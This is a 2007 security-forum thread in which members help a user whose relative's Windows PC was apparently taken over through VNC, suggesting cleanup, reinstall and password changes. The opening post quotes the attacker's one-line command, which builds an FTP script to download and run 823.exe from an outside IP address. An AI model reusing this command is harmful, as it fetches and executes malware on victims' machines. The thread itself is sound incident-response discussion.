The Ethical Hacker Network

BillV

Hero Member

Offline

Posts: 1830

Help... Worm?

« on: March 24, 2007, 09:50:41 PM »

Hey guys,

My brother-in-law just called me frantically saying his computer had been hacked. He was in a remote session to his computer from work using VNC when he suddenly lost, and could not regain, the connection.

When he got home, he noticed that when he clicked start > run, the last command was:

Code:

cmd.exe /c del i&echo open 24.158.178.152 27206 > i&echo user 1 1 >> i &echo get 823.exe >> i &echo quit >> i &ftp -n -s:i &823.exe&del i&exit

Now, if you connect to that IP on that port, you'll be greated with "220 Reptile welcomes you.." which looks like a standard FTP greeting, but accepts no commands. Everything I enter I receive a 503 command unknown. Also, none of his system commands are working (ie. cd, netstat, ipconfig, etc.). Sounds sorta like a rootkit.

Any suggestions?


	Logged

LSOChris

Guest

Re: Help... Worm?

« Reply #1 on: March 24, 2007, 09:59:44 PM »

unplug network cable...

from another computer download linux distro of your choice...

burn disc...

stick in hacked computer and reboot :-)

seriously though, do #1 and starting running your AV and rootkit finder tools to try to find out what 823.exe did or is still doing. hopefully you can clean it up but it might be time to back up (and be careful! what you backup) and reinstall.


	Logged

Craig

EH-Net Columnist
Jr. Member

Offline

Posts: 69

Re: Help... Worm?

« Reply #2 on: March 24, 2007, 10:01:44 PM »

Found a discussion at SecurityFocus that might be related...the app discussed here had the same 220 string:

http://www.securityfocus.com/archive/100/408804/30/240/threaded


	Logged

http://www.sourcesec.com

BillV

Hero Member

Offline

Posts: 1830

Re: Help... Worm?

« Reply #3 on: March 24, 2007, 10:16:35 PM »

Thanks guys (quick reply too!).

That's what I had suggested pretty much. He's working on it offline now I believe (he's in a different state). I saw that link as well. That leads me to believe that the IP listed in the command is that of a system hosting the worm then, right? Also, so far AVG and Norton have not picked up anything. I haven't been able to locate anything on '823' as of yet.


	Logged

Kevan

Jr. Member

Offline

Posts: 95

Re: Help... Worm?

« Reply #4 on: March 25, 2007, 09:25:02 AM »

Norton is horrible. I downloaded Clamwin onto my parents computer running Windows, and it found 9024 infected/viruses in their computer. I put them in a quarentine folder and scanned it with Norton-it never found anything.


	Logged

I may be a newbie, but I am willing to learn.

Cutaway

Jr. Member

Offline

Posts: 96

Cutaway

Re: Help... Worm?

« Reply #5 on: March 25, 2007, 11:48:21 AM »

Not sure if you have identified how the system was compromised or how privileges were escalated. Milw0rm has an exploit for 823.c but it is for "Dream FTP" and it does not appear to be a local exploit. You can find the source: http://www.milw0rm.org/exploits/823

Once you have cleaned the system you are going to want to identify how the system was compromised before you put it back online. You will want to also check any systems that are located on the same network as they might have been the source of the intrusion or may have fallen victim to attacks from this system. If the other systems are rooted then you may need to resort to monitoring network traffic.

One thing you might consider is backing up all of the business files and reloading the system. Sometimes this is the best way to handle incidents involving rootkits. By storing files to a separate media and then scanning them from a separate, protected, system you can be sure that there is no "detectable" malware in these files. Then you can DBNuke the old hard drive and get rid of anything except for firmware related malware which is highly unlikely.

Just throwing options out there for you to consider as you help your friend with additional risk analysis.

Good luck,
Cutaway


	Logged

Go forth and do good things,
Cutaway

plik

Newbie

Offline

Posts: 31

Re: Help... Worm?

« Reply #6 on: March 25, 2007, 01:42:03 PM »

As far as I'm aware (I'm sure someone will correct me if I'm wrong) commands only appear in start > run if they've been run from there. So someone had access to his desktop.

There has been a large increase in scanning for VNC servers recently, so I would suspect that was point of entry.


	Logged

Cutaway

Jr. Member

Offline

Posts: 96

Cutaway

Re: Help... Worm?

« Reply #7 on: March 25, 2007, 07:44:02 PM »

Quote

commands only appear in start > run if they've been run from there.

That is actually a very good point. If this is the case then either the VNC connection was exploited or, more probably, brute forced. The cracker apparently had a VNC connection to the system. This system then could have been used to compromise another system using 823.exe or to escalate privileges on the local host.

If your brother-in-law is like most people he might be using this password or something like it on multiple places. He may want to change ALL of his passwords to something completely different.


	Logged

Go forth and do good things,
Cutaway

BillV

Hero Member

Offline

Posts: 1830

Re: Help... Worm?

« Reply #8 on: March 25, 2007, 09:55:34 PM »

Thanks again for all of the great tips. All are very helpful and much appreciated. I will pass the information along to my brother-in-law. I haven't heard back from a couple of emails I sent, so I'm not sure what course of action he's taken.


	Logged

Pages: [1] Go Up

« previous next »